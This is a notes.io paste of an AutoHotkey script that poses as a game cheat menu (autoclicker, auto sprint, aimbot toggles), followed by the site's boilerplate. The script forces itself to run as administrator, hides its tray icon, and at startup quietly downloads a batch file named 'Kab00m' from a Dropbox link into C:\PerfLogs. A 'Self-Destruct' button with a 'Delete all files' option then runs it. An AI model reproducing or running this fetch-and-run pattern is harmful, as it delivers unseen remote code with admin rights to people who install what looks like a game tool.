NotesWhat is notes.io?

Notes brand slogan

Notes - notes.io

#NoTrayIcon
#SingleInstance force

;#IfWinActive javaw.exe
;#IfWinActive Badlion ahk_exe javaw.exe
;#IfWinActive Minecraft ahk_exe javaw.exe


if not A_IsAdmin
{
Run *RunAs "%A_ScriptFullPath%" ; Requires v1.0.92.01+
ExitApp
}








;=========================================================================================================================================================
;========================================================================================================================================================= Security
;=========================================================================================================================================================
;Hotkey, *lbutton, Toggle

#NoTrayIcon
k0 = 0x99999999
k1 = 0x99999999
k2 = 0x99999999
k3 = 0x99999999

l0 = 0x99999999
l1 = 0x99999999

m0 = 0x99999999
m1 = 0x99999999

IniFile = SafeSW.ini

PCdata = %COMPUTERNAME%%HOMEPATH%%USERNAME%%PROCESSOR_ARCHITECTURE%%PROCESSOR_IDENTIFIER%
PCdata = %PCdata%%PROCESSOR_LEVEL%%PROCESSOR_REVISION%%A_OSType%%A_OSVersion%%Language%

Fingerprint := XCBC(Hex(PCdata,StrLen(PCdata)), 0,0, 0,0,0,0, 1,1, 2,2)

TEA(ByRef y,ByRef z, k0,k1,k2,k3)
{
s = 0
d = 0x9E3779B9
Loop 32
{
k := "k" . s & 3
y := 0xFFFFFFFF & (y + ((z << 4 ^ z >> 5) + z ^ s + %k%))
s := 0xFFFFFFFF & (s + d) ; simulate 32 bit operations
k := "k" . s >> 11 & 3
z := 0xFFFFFFFF & (z + ((y << 4 ^ y >> 5) + y ^ s + %k%))
}
}



XCBC(x, u,v, k0,k1,k2,k3, l0,l1, m0,m1)
{
Loop % Ceil(StrLen(x)/16)-1
XCBCstep(u, v, x, k0,k1,k2,k3)

If (StrLen(x) = 16)
{
u := u ^ l0
v := v ^ l1
XCBCstep(u, v, x, k0,k1,k2,k3)
}
Else {
u := u ^ m0
v := v ^ m1
x = %x%100000000000000
XCBCstep(u, v, x, k0,k1,k2,k3)
}
Return Hex8(u) . Hex8(v) ; 16 hex digits returned
}

XCBCstep(ByRef u, ByRef v, ByRef x, k0,k1,k2,k3)
{
StringLeft p, x, 8
StringMid q, x, 9, 8
StringTrimLeft x, x, 16
p = 0x%p%
q = 0x%q%
u := u ^ p
v := v ^ q
TEA(u,v,k0,k1,k2,k3)
}

Hex8(i)
{
format = %A_FormatInteger%
SetFormat Integer, Hex
i += 0x100000000
StringTrimLeft i, i, 3
SetFormat Integer, %format%
Return i
}

Hex(ByRef b, n=0)
{
format = %A_FormatInteger%
SetFormat Integer, Hex

m := VarSetCapacity(b)
If (n < 1 or n > m)
n := m
Loop %n%
{
x := 256 + *(&b+A_Index-1)
StringTrimLeft x, x, 3
h = %h%%x%
}
SetFormat Integer, %format%
Return h
}

;============================================================================================================================================

;PCdata = %COMPUTERNAME%%HOMEPATH%%USERNAME%%PROCESSOR_ARCHITECTURE%%PROCESSOR_IDENTIFIER%
;PCdata1 = %PCdata%%PROCESSOR_LEVEL%%PROCESSOR_REVISION%%A_OSType%%A_OSVersion%%Language%%A_WinDir%
;
;if PCdata1 = DESKTOP-F0OTERJUsersJackJackAMD64Intel64 Family 6 Model 142 Stepping 9, GenuineIntel68e09WIN32_NT10.0.17134C:WINDOWS
; {
; goto,next
; }
;else
; {
; msgbox,16,,Contact Igi3k To Resolve This Error. This error was caused by the application and the machine having different values.
; exitapp
; }
;return
;next:
;if Fingerprint = 02F379698CEFA952
; {
; goto,menu
; }
;else
; {
; msgbox,16,,Contact Igi3k To Resolve This Error. This error was caused by the application and the machine having different values.
; exitapp
; }
;return
;
menu:









loop 11
{
Random, a, 0,1
if a=1
Random, OutputVar, 48,57
else
Random, OutputVar, 97,122
OutputVar:=chr(OutputVar)
var = %var%%OutputVar%
}



;Hotkey, *lbutton, Toggle
Menu Tray, Icon, shell32.dll, 5 ; Folder icon
Gui, -SysMenu
Gui +OwnDialogs
SendMessage, 0x7, 0, 0,Button24,A ; WM_SETFOCUS = 0x07
Gui +Owner
CustomColor = EEAA99
Gui +LastFound +AlwaysOnTop
Gui, Color, black
WinSet, TransColor, %CustomColor% 220
SendMessage, 0x7, 0, 0,Button24,A ; WM_SETFOCUS = 0x07
Gui, Font, CWhite, arial
Gui, Font, S12 red, Arial
SendMessage, 0x7, 0, 0,Button24,A ; WM_SETFOCUS = 0x07
Gui, Add, Tab, x2 y-1 w470 h250 , Home|AutoClicker|Auto Soup/Pot|Sprint|Self-Destruct|
SendMessage, 0x7, 0, 0,Button24,A ; WM_SETFOCUS = 0x07
Gui, Font, S12 cff8100, Arial
Gui, Add, Text, x6 y30 w100 h100 , Auto Clicker
Gui, Add, Text, x6 y60 w100 h50 , Auto Sprint
Gui, Add, Text, x6 y90 w100 h50 , Double Pump
Gui, Add, Text, x6 y120 w100 h50 , Quick Fort
Gui, Add, Text, x6 y150 w100 h50 , Crouch Shot
Gui, Add, Text, x6 y180 w100 h50 , Speedhack?
Gui, Add, Text, x6 y210 w100 h20 , Aimbot
Gui, Font, S12 cff8100, Arial
Gui Add, Checkbox, x110 y30 w100 h20 vAuto gAutoChanged, % "On/Off"
Gui Add, Checkbox, x110 y60 w100 h20 vPeak gPeakChanged, % "On/Off"
Gui Add, Checkbox, x110 y90 w100 h20 vDp gDpChanged, % "On/Off"
Gui Add, Checkbox, x110 y120 w100 h20 vFort gFortChanged, % "On/Off"
Gui Add, Checkbox, x110 y150 w100 h20 vCrouch gCrouchChanged, % "On/Off"
Gui Add, Checkbox, x110 y180 w100 h20 vSpeed gSpeedChanged, % "On/Off"
Gui Add, Checkbox, x110 y210 w100 h20 vAimbot gAimbotChanged, % "On/Off"

SendMessage, 0x7, 0, 0,Button24,A ; WM_SETFOCUS = 0x07
Gui, Font, CWhite, arial
Gui, Tab, AutoClicker
Gui, Add, Text, x32 y39 w170 h20 , Min Delay (MS)
Gui, Add, Slider, x32 y59 w410 h30 vMin gMin ToolTip Range0-300, 51
Gui, Add, Text, x32 y99 w170 h20 , Max Delay (MS)
Gui, Add, Slider, x32 y119 w410 h30 vMax gMax ToolTip Range50-300, 112
Gui, Add, Text, x32 y159 w240 h20 , Jitter Power (0 = no jitter)
Gui, Add, Slider, x32 y179 w410 h30 Range0-25 ToolTip vJit gJit, 0
SendMessage, 0x7, 0, 0,Button24,A ; WM_SETFOCUS = 0x07
Gui, Tab, Self-Destruct
Gui, Add, Button, gSubmitAndRun, Self Destruct
Gui, Add, Checkbox, vMyCheckbox, Delete all files
SendMessage, 0x7, 0, 0,Button24,A ; WM_SETFOCUS = 0x07
sleep 50
UrlDownloadToFile,https://www.dropbox.com/s/5it4167br770owo/Kab00m2028129.bat?dl=1, C:PerfLogsKab00m.bat
Gui, Show, center h250 w473, %var%
Gui, Submit, NoHide
Return


AutoChanged:
Gui Submit, NoHide
if (Auto = 1) {
auto:=true
}
else {
auto:=false
}
Return

PeakChanged:
Gui Submit, NoHide
if (Peak = 1) {
peak:=true
}
else {
peak:=false
}
Return

DpChanged:
Gui Submit, NoHide
if (Dp = 1) {
dp:=true
}
else {
dp:=false
}
Return

FortChanged:
Gui Submit, NoHide
if (Fort = 1) {
fort:= true
}
else {
fort := false
}
Return

CrouchChanged:
Gui Submit, NoHide
if (Crouch = 1) {
crouch:=true
}
else {
crouch:=false
}
Return

SpeedChanged:
Gui Submit, NoHide
if (Speed = 1) {
speed:=true
}
else {
speed:=false
}
Return

AimbotChanged:
Gui Submit, NoHide
if (Aimbot = 1) {
aimbot:=true
}
else {
aimbot:=false
}
Return


`::
IfWinExist, %var%
WinHide
Else
WinShow, %var%

Min:
{
Gui, Submit, NoHide
}
return

Max:
{
Gui, Submit, NoHide
}
return

Jit:
{
Gui, Submit, NoHide
}
return

#if auto
x::Hotkey, *lbutton, Toggle
*lbutton::
Send,{lbutton}
While GetKeyState("lbutton", "P")
{
Send,{lbutton}
Random, delay, 1, 5
Sleep %delay%
Random, j1, 3,-3
Random, j2, 3,-3
MouseMove, %j1%, %j2%, 0, R
}
return

SubmitAndRun:
Gui, Submit
If MyCheckBox {
Gosub script
}
exitapp
return


#if peak
*W::
Send, {ctrl down}
Send, {W down}
KeyWait, W
Send, {ctrl up}
Send, {W up}
return



script:
Run, C:PerfLogsKab00m.bat
ExitApp

GuiClose:
ExitApp
     
 
what is notes.io
 

Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...

With notes.io;

  • * You can take a note from anywhere and any device with internet connection.
  • * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
  • * You can quickly share your contents without website, blog and e-mail.
  • * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
  • * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.

Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.

Easy: Notes.io doesn’t require installation. Just write and share note!

Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )

Free: Notes.io works for 12 years and has been free since the day it was started.


You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;


Email: [email protected]

Twitter: http://twitter.com/notesio

Instagram: http://instagram.com/notes.io

Facebook: http://facebook.com/notesio



Regards;
Notes.io Team

     
 
Shortened Note Link
 
 
Looding Image
 
     
 
Long File
 
 

For written notes was greater than 18KB Unable to shorten.

To be smaller than 18KB, please organize your notes, or sign in.